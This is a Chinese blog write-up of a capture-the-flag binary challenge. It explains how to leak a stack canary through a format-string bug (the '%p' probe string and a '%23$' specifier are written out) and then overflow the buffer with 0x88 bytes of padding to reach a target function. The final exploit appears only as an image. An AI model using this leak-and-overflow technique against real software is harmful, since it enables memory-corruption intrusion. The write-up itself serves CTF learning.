Loading... <!-- wp:paragraph --> <p>这是一道格式化字符串和栈溢出结合的题目,也是我第一次smash了canary:)</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":379,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103135359.png" alt="" class="wp-image-379"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>发现有canary和栈不可执行。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>然后到IDA里面看一下</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":382,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103140340.png" alt="" class="wp-image-382"style=""></figure></div> <!-- /wp:image --> <!-- wp:image {"align":"center","id":383,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103140510.png" alt="" class="wp-image-383"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>我们发现确实有有栈溢出和格式化字符串的漏洞。栈溢出由于有Canary,不能直接用,所有我们可以考虑用格式化字符串来泄露Canary,然后再写回栈时不改变Canary,就可以返回到</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":384,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103140912.png" alt="" class="wp-image-384"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>这里了。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>首先我们考虑泄露Canary,先构造字符串<code>aaaaaaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p</code>,看一下输出</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":385,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103141145.png" alt="" class="wp-image-385"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>我们可以发现aaaaaaaa在第六个参数上(这里前面几个参数是栈中的buf前面的参数,但其实对这个我还不是很了解,准备以后再好好补补,现在就先用着),<img class="wp-image-386" style="width: 150px;" src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103141546.png" alt=""style="">这里我们看到buf在)0x90处,是第六个参数,(0x90-0x8)/0x8=17,所以我们就知道Canary在第23个参数上,于是格式化字符串为<code>%23$</code>就可以泄露出Canary的值。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>有了Canary,我们就可以进行栈溢出。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>首先我们要知道在有Canary的时候,栈帧的结构是改变的</p> <!-- /wp:paragraph --> <!-- wp:image {"id":387,"sizeSlug":"large"} --> <figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103142350.png" alt="" class="wp-image-387"style=""></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>我们也可以理解为多了一个不能改变的局部变量,又有<img class="wp-image-388" style="width: 150px;" src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103142507.png" alt=""style="">,所以偏移就是'a'*0x88。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>最后的exp:</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":389,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201103142652.png" alt="" class="wp-image-389"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p></p> <!-- /wp:paragraph --> 最后修改:2020 年 12 月 30 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧